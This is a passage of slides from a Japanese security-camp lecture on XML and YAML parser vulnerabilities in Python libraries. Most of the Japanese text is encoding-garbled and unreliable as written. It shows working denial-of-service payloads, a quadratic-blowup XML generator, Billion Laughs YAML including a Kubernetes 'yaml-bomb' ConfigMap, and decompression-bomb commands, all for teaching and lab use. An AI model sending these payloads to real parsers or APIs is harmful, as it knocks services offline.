  113. #JMMJPO-BVHIT ༗ޮͳ1ZUIPOϥΠϒϥϦ  IUUQTQZQJPSHQSPKFDUEFGVTFEYNM

  114. ԋशखݩͰࢼͯ͠ΈΑ͏ʢ෼ʣ #JMMJPO-BVHITΛࢼ͢ w ࣍ͷσΟϨΫτϦ഑Լʹ͋Δ֤%PDLFSpMFΛಈ͔͢ͱɺ 1ZUIPOͷ֤ϥΠϒϥϦΛ༻͍ͯॻ͔Εͨίʔυ͕ #JMMJPO-BVHITΛࢼߦ͢Δ9.-ϑΝΠϧΛॲཧ͢Δ  w ֤ϑΥϧμ಺ͷ%PDLFSpMF͔ΒίϯςφΛϏϧυͯ͠ಈ͔͍ͯͩ͘͠͞ 

    $ git clone git@github.com:tkmru/seccamp2021-b5.git $ cd seccamp2021-b5 $ cd handson/xml-parser/billion-laughs $ cd etree $ docker build . -t billion-laughs-etree $ docker run billion-laughs-etree

  115. Өڹ͸ϥΠϒϥϦͦΕͧΕ w 9.-Λύʔε͢Δ࣮૷͕ͦΕͧΕҟͳΔͨΊӨڹ౓߹͍΋ҟͳΔ w FUSFFʹ͸࠷ߴʹࢗ͞Δʂ  #JMMJPO-BVHITΛࢼ͢

  116. ղઆ͍ͯ͘͠੬ऑੑ 9.-ʹΑΔ%P4߈ܸ w #JMMJPO-BVHIT w 2VBESBUJDCMPXVQFOUJUZFYQBOTJPO w &YUFSOBMFOUJUZFYQBOTJPO w %5%3FUSJFWBM

    w %FDPNQSFTTJPO#PNC  ΠϚίί

  117. 2VBESBUJD#MPXVQFOUJUZFYQBOTJPO w #JMMJPO-BVHITʹࣅ͍ͯΔ w ೖΕࢠʹͳͬͨ&OUJUZΛ࢖༻͢ΔͷͰ͸ͳ͘ɺ਺ઍจࣈͷจࣈྻΛද͢େ͖ͳ &OUJUZΛ܁Γฦ͠ෳ੡ͯ͠ϝϞϦফඅΛૂ͏ w ,#ఔ౓ͷ9.-ϑΝΠϧͰɺ.#͔Β਺(#ͷϝϞϦΛফඅͤ͞ΒΕΔ  9.-ʹΑΔ%P4߈ܸ

  118. 2VBESBUJD#MPXVQFOUJUZFYQBOTJPO w ڊେͳจࣈྻʢ"""""""""""""""ʜʣ͕ೖͬͨΤϯςΟςΟʢYʣΛ ෳ਺ճݺͼग़͢͜ͱͰലେͳϝϞϦফඅΛૂ͏ w ࢦ਺ؔ਺తʹϝϞϦফඅྔ͕૿େ͢Δ#JMMJPO-BVHIT΄Ͳޮ཰తͰ͸ͳ͍ w ਂ͍ೖΕࢠʹͳͬͨΤϯςΟςΟΛېࢭ͢ΔύʔαͷରࡦΛ͢Γൈ͚ΒΕΔ  <?xml

    version="1.0"?> <!DOCTYPE DoS [ <!ENTITY x "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(লུ)"> ]> <DoS>&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;(লུ)</DoS> 9.-ϑΝΠϧྫ

  119. 2VBESBUJD#MPXVQFOUJUZFYQBOTJPO 9.-ϑΝΠϧྫ w ڊେͳจࣈྻΛද͢ͷͰ9.-ϑΝΠϧͦͷ··Λจࣈྻͱͯ͠ѻ͏ΑΓ ίʔυதͰ9.-ϑΝΠϧΛ૊ΈཱͯΔ΄͏͕ѻ͍΍͍͢  size = 55000 entity

    = 'A' * size refs = '&x;' * size data = '''\ <?xml version="1.0"?> <!DOCTYPE DoS [ <!ENTITY x "{entity}"> ]> <DoS>{entityReferences}</DoS> '''.format(entity=entity, entityReferences=refs)

  120. ༗ޮͳ1ZUIPOϥΠϒϥϦ  IUUQTQZQJPSHQSPKFDUEFGVTFEYNM 2VBESBUJD#MPXVQFOUJUZFYQBOTJPO

  121. 2VBESBUJDCMPXVQFOUJUZFYQBOTJPOΛࢼ͢  ԋशखݩͰࢼͯ͠ΈΑ͏ʢ෼ʣ w ࣍ͷσΟϨΫτϦ഑Լʹ͋Δ֤%PDLFSpMFΛಈ͔͢ͱɺ 1ZUIPOͷ֤ϥΠϒϥϦΛ༻͍ͯॻ͔Εͨίʔυ͕ 2VBESBUJDCMPXVQΛࢼߦ͢Δ9.-ϑΝΠϧΛॲཧ͢Δ  w ֤ϑΥϧμ಺ͷ%PDLFSpMF͔ΒίϯςφΛϏϧυͯ͠ಈ͔͍ͯͩ͘͠͞

    $ git clone git@github.com:tkmru/seccamp2021-b5.git $ cd seccamp2021-b5 $ cd handson/xml-parser/quadratic-blowup/ $ cd etree $ docker build . -t quadratic-blowup-etree $ docker run quadratic-blowup-etree

  122. ଞͷύʔαͰ΋͍͚ΔͷͰ͸🤔ʁ w #JMMJPO-BVHIT2VBESBUJDCMPXVQFOUJUZFYQBOTJPO͸9.-ϑΝΠϧ͕ ࣋ͭࢀরػೳΛѱ༻͢Δ੬ऑੑ w ଞʹಉ༷ͷػೳ͕͋ΔϑΝΠϧ͕͋Ε͹ಉ͡ςΫ͕࢖͑ͦ͏🤔ʂʁ 

  123. #JMMJPO-BVHIT :".-ύʔαʹ΋༗ޮ  w #JMMJPO-BVHITΛࢼߦ͢Δ:".-ϑΝΠϧ lol1: &lol1 "lol" lol2: &lol2

    [*lol1,*lol1,*lol1,*lol1,*lol1,*lol1,*lol1,*lol1,*lol1] lol3: &lol3 [*lol2,*lol2,*lol2,*lol2,*lol2,*lol2,*lol2,*lol2,*lol2] lol4: &lol4 [*lol3,*lol3,*lol3,*lol3,*lol3,*lol3,*lol3,*lol3,*lol3] lol5: &lol5 [*lol4,*lol4,*lol4,*lol4,*lol4,*lol4,*lol4,*lol4,*lol4] lol6: &lol6 [*lol5,*lol5,*lol5,*lol5,*lol5,*lol5,*lol5,*lol5,*lol5] lol7: &lol7 [*lol6,*lol6,*lol6,*lol6,*lol6,*lol6,*lol6,*lol6,*lol6] lol8: &lol8 [*lol7,*lol7,*lol7,*lol7,*lol7,*lol7,*lol7,*lol7,*lol7] lol9: &lol9 [*lol8,*lol8,*lol8,*lol8,*lol8,*lol8,*lol8,*lol8,*lol8] lol10: &lol10 [*lol9,*lol9,*lol9,*lol9,*lol9,*lol9,*lol9,*lol9,*lol9]

  124. #JMMJPO-BVHIT LTͰͷ࣮ྫ  w ,VCFSOFUFT"1*αʔόʢLTJPLVCFSOFUFTQLHBQJTFSWFS  ʣʹ ࡉ޻ͨ͠:".-ϑΝΠϧΛૹ৴͢Δͱ#JMMJPO-BVHIT͕ى͜Δ੬ऑੑ w $7&

    w IUUQTHJUIVCDPNLVCFSOFUFTLVCFSOFUFTJTTVFT

  125. #JMMJPO-BVHIT LTͰͷ࣮ྫ  w IUUQTHJUIVCDPNLVCFSOFUFTLVCFSOFUFTJTTVFTΑΓൈਮ apiVersion: v1 data: a: &a

    ["web","web","web","web","web","web","web","web","web"] b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a] c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b] d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c] e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d] f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e] g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f] h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g] i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h] kind: ConfigMap metadata: name: yaml-bomb namespace: default

  126. 2VBESBUJDCMPXVQFOUJUZFYQBOTJPO :".-ύʔαʹ΋༗ޮ  w #JMMJPO-BVHITʹࣅͨ2VBESBUJDCMPXVQ΋ಉ͘͡༗ޮ w :".-ύʔαͰͷ2VBESBUJDCMPXVQʹରͯ͠ݴٴ͍ͯ͠Δจݙ͸ ͳ͔ͥݟ͔ͭΒͳ͍🤔 w ਂ͍ೖΕࢠʹͳͬͨΤϯςΟςΟΛېࢭ͢ΔύʔαͷରࡦΛ

    ͢Γൈ͚ΒΕΔʢ͸ͣʣ w ֤ϥΠϒϥϦͷରࡦͷࠩҟ·ͰௐࠪͰ͖ͯͳ͍͕ɺ 9.-ύʔαͱಉ͘͡#JMMJPO-BVHIT͸ແޮԽ͞Ε͍ͯΔ͚ΕͲɺ 2VBESBUJDCMPXVQ͕༗ޮͳϥΠϒϥϦ΋͋Γͦ͏ʢଟ෼ʣ

  127. 2VBESBUJDCMPXVQFOUJUZFYQBOTJPO :".-ύʔαʹ΋༗ޮ  w 2VBESBUJDCMPXVQΛࢼߦ͢Δ:".-ϑΝΠϧ w Πϯλʔωοτ্ʹ1P$͕ͳ͍ʢଟ෼ʣͷͰࣗ෼Ͱॻ͖·ͨ͠ʂ lol1: &lol1 “AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(লུ)AAAAAAAAAAAAAAAA”

    lol2: &lol2 [*lol1,*lol1,*lol1,*lol1,*lol1,*lol1,*lol1,*lol1,*lol1,(লུ),*lol1]

  128. ԋशखݩͰࢼͯ͠ΈΑ͏ʢ෼ʣ :".-ύʔαͰࢼ͢ w ࣍ͷσΟϨΫτϦ഑Լʹ͋Δ֤%PDLFSpMFΛಈ͔͢ͱɺ 1Z:".-ϥΠϒϥϦΛ༻͍ͯॻ͔Εͨίʔυ͕ #JMMJPO-BVHITΛࢼߦ͢Δ:".-ϑΝΠϧΛॲཧ͢Δ  w ֤ϑΥϧμ಺ͷ%PDLFSpMF͔ΒίϯςφΛϏϧυͯ͠ಈ͔͍ͯͩ͘͠͞ 

    $ git clone git@github.com:tkmru/seccamp2021-b5.git $ cd seccamp2021-b5 $ cd handson/yml-parser $ cd etree $ docker build . -t billion-laughs-etree $ docker run billion-laughs-etree

  129. ղઆ͍ͯ͘͠੬ऑੑ 9.-ʹΑΔ%P4߈ܸ w #JMMJPO-BVHIT w 2VBESBUJDCMPXVQFOUJUZFYQBOTJPO w &YUFSOBMFOUJUZFYQBOTJPO w %5%3FUSJFWBM

    w %FDPNQSFTTJPO#PNC  ΠϚίί

  130. &YUFSOBMFOUJUZFYQBOTJPO 99&ͷҰछ w Α͘஌ΒΕ͍ͯΔλΠϓͷ99& w ઌ΄Ͳղઆͨ͠΋ͷͱಉ༷ͳͷͰ͜͜Ͱ͸ղઆΛׂѪ 

  131. %5%3FUSJFWBM w ͜Ε΋99&ͷҰछ w υΩϡϝϯτλΠϓͷࢦఆΛϩʔΧϧύε΍63-Λ࢖ͬͯߦ͑ΔͨΊ ࢦఆ͞Εͨ৔ॴʹ͋Δ৘ใΛऔಘͰ͖Δ  99&ͷҰछ <?xml version="1.0"

    encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head/> <body>text</body> </html>

  132. ༗ޮͳ1ZUIPOϥΠϒϥϦ  IUUQTQZQJPSHQSPKFDUEFGVTFEYNM &YUFSOBMFOUJUZFYQBOTJPO%5%3FUSJFWBM

  133. &YUFSOBMFOUJUZFYQBOTJPOΛࢼ͢  ԋशखݩͰࢼͯ͠ΈΑ͏ʢ෼ʣ w ࣍ͷσΟϨΫτϦ഑Լʹ͋Δ֤%PDLFSpMFΛಈ͔͢ͱɺ 1ZUIPOͷ֤ϥΠϒϥϦΛ༻͍ͯॻ͔Εͨίʔυ͕ &YUFSOBMFOUJUZFYQBOTJPOΛࢼߦ͢Δ9.-ϑΝΠϧΛॲཧ͢Δ  w ֤ϑΥϧμ಺ͷ%PDLFSpMF͔ΒίϯςφΛϏϧυͯ͠ಈ͔͍ͯͩ͘͠͞

    $ git clone git@github.com:tkmru/seccamp2021-b5.git $ cd seccamp2021-b5 $ cd handson/xml-parser/external-entity-expansion/ $ cd pulldom/python3.7.0 $ docker build . -t external-entity-expansion-pulldom $ docker run external-entity-expansion-pulldom

  134. ղઆ͍ͯ͘͠੬ऑੑ 9.-ʹΑΔ%P4߈ܸ w #JMMJPO-BVHIT w 2VBESBUJDCMPXVQFOUJUZFYQBOTJPO w &YUFSOBMFOUJUZFYQBOTJPO w %5%3FUSJFWBM

    w %FDPNQSFTTJPO#PNC  ΠϚίί

  135. %FDPNQSFTTJPO#PNC ѹॖ͞ΕͨϑΝΠϧʹΑΔ%P4 w ల։͢ΔͱڊେͳαΠζʹͳΔѹॖ͞ΕͨϑΝΠϧΛૹΔ͜ͱͰɺ σΟεΫ༰ྔͷѹഭΛૂ͏߈ܸख๏ w ѹॖ͞Εͨ9.-ετϦʔϜΛղੳͰ͖Δ9.-ϥΠϒϥϦ͕ର৅ʹͳΔ w ೔ຊޠͰ͸ߴѹॖϑΝΠϧര஄ɺ;*1ര஄ͱݺ͹Ε͍ͯΔ 

    $ dd if=/dev/zero bs=1M count=1024 | gzip > zeros.gz # bs*count=1GB $ dd if=/dev/zero bs=1M count=1024 | lzma -z > zeros.xy # bs*count=1GB $ ls -sh zeros.* 1020K zeros.gz #શͯ0ͳͷͰѹॖ཰͕ߴ͍ 148K zeros.xy #શͯ0ͳͷͰѹॖ཰͕ߴ͍

  136. ༗ޮͳ1ZUIPOϥΠϒϥϦ  IUUQTQZQJPSHQSPKFDUEFGVTFEYNM %FDPNQSFTTJPO#PNC

  137. %FDPNQSFTTJPO#PNCʜ  ԋशͳ͠ʜ w ҆શʹԋशΛ΍ͬͯ΋Β͏ͷ͕೉͍͠ͷͰ࢒೦ͳ͕Βԋश͸ͳ͍Ͱ͢ʜ

  138. ͜͜·Ͱͷ·ͱΊ w 9.-ʹ͸ଟछଟ༷ͳ߈ܸςΫ͕͋ΔͷͰɺઃఆϑΝΠϧʹ͸+40/ͳͲΛ ࢖͏ํ͕͍͍ w ٯʹ੬ऑੑΛ୳ཱ͢৔͔ΒݟΔͱ9.-ϑΝΠϧΛύʔε͢Δ෦෼͸ૂ͍໨ w 9.-ϥΠϒϥϦຖʹ༗ޮͳ੬ऑੑ͕ҧ͏ͷ͸1ZUIPOʹݶͬͨ͜ͱͰ͸ͳ͍ w ڵຯ͕͋Ε͹ଞͷݴޠͷ΋ͷ΋ௐ΂ͯΈ͍ͯͩ͘͞

    

  139. ୈ̐ষ (JU)VCΛ࢖ͬͨόάϋϯτํ๏

  140. ϥΠϒϥϦຖͷ੬ऑੑΛ஌ͬͨޙ͸ʜ (JU)VCΛ࢖ͬͨόάϋϯτํ๏ w ಛఆͷϥΠϒϥϦΛ࢖༻͍ͯ͠ΔίʔυΛ͍͔ʹ୳͔͢ w (JU)VCͷػೳΛ׆༻͢Δͱݟ͚ͭΒΕΔ w 5PQJDػೳ w ίʔυݕࡧػೳ

    w ίϛοτݕࡧػೳ w JTTVFݕࡧػೳ 

  141. Ұ෦ࣗओن੍😢 

  142. ԋश੬ऑੑ͕͋Δ044Λ୳͢ʢ͕࣌ؒ͋Ε͹ʣ w ࢒Γ͕࣌ؒ͋Ε͹΍ͬͯ΋Β͏ w ͳ͔ͬͨΒऴΘΔ 

  143.  IUUQTPXBTQPSHXXXQEGBSDIJWF08"41/;9.-%BOHFSPVTQEG

  144. ࠶ܝ੬ऑੑΛൃݟͨ͠ޙ͸ใࠂʂ  IUUQTJTFDWVMGPSNJQBHPKQJQBWVMNBJOJOEFYIUNM

  145. ஫ҙࣄ߲  w ଟ෼ɺ͋Δఔ౓ελʔ͕͍͍ͭͯΔ(JU)VCϦϙδτϦͰͳ͍ͱରԠͯ͠΋Β ͑ͳ͍

  146. ୈ̑ষ ٕज़ͱ޲͖߹͏࢟੎ͷ࿩

  147. ੬ऑੑΛҙࣝͯ͠ΤϯδχΞϦϯάʹऔΓ૊Ή w 9.-ύʔαʹؔ͢Δ੬ऑੑʹৄ͘͠ͳͬͨͷ͸"OESPJE.BOJGFTUYNMΛ ύʔε͢ΔίʔυΛॻ͍ͨͷ͕͖͔͚ͬ w ੩తղੳπʔϧʹࣗ෼͕ॻ͍ͨίʔυΛೖྗͨ͠Β੬ऑੑ͕͋ͬͨ w 1ZUIPOͷ9.-ϥΠϒϥϦ͸σϑΥϧτͰ੬ऑͰͦΕͧΕ༗ޮͳ੬ऑੑ͕ҟͳ Δ͜ͱΛ஌ͬͨ 

  148. ੬ऑੑΛҙࣝͯ͠ΤϯδχΞϦϯάʹऔΓ૊Ή w ίʔυΛॻ࣌͘ʹࣗ෼͕ॻ͍ͨίʔυʹ੬ऑੑ͕ͳ͍͔֬ೝ͢Δ͜ͱͰ ੬ऑੑΛͳ͘͠ɺηΩϡϦςΟͷ஌ࣝ΋਎ʹͭ͘ w ։ൃͷܦݧΛੵΈͳ͕ΒɺηΩϡϦςΟͷ஌ݟ΋ߴΊΒΕΔ w ͦͯ͠ಘͨ஌ࣝͰόάϋϯτ͢Δͱ$7&ΛऔಘͰ͖ͨΓɺใ঑ۚΛ໯ͬͨΓ Ͱ͖Δ͔΋ʜʂʂʂ 

  149. ੬ऑੑΛҙࣝͯ͠ΤϯδχΞϦϯάʹऔΓ૊Ή w ηΩϡϦςΟɾΩϟϯϓʹࢀՃ͔ͨ͠Βͱ͍ͬͯશһ͕ηΩϡϦςΟͷಓʹ ਐΉ༁Ͱ͸ͳͯ͘։ൃଆͷಓΛาΜͰ͍͘ਓ΋͍Δ w ηΩϡϦςΟͷ஌ࣝ͸ηΩϡϦςΟΤϯδχΞͱͯ͠΍͍ͬͯ͘ʹ΋ ։ൃଆͷΤϯδχΞͱͯ͠΍͍ͬͯ͘ʹ΋໾ཱͭ w ࠓޙηΩϡϦςΟɾΩϟϯϓͰֶΜͩ஌ࣝͷ͏ͪԿ͔͕໾ཱͯͯ͘ΕΔͱ ͏Ε͍͠Ͱ͢

    

  150.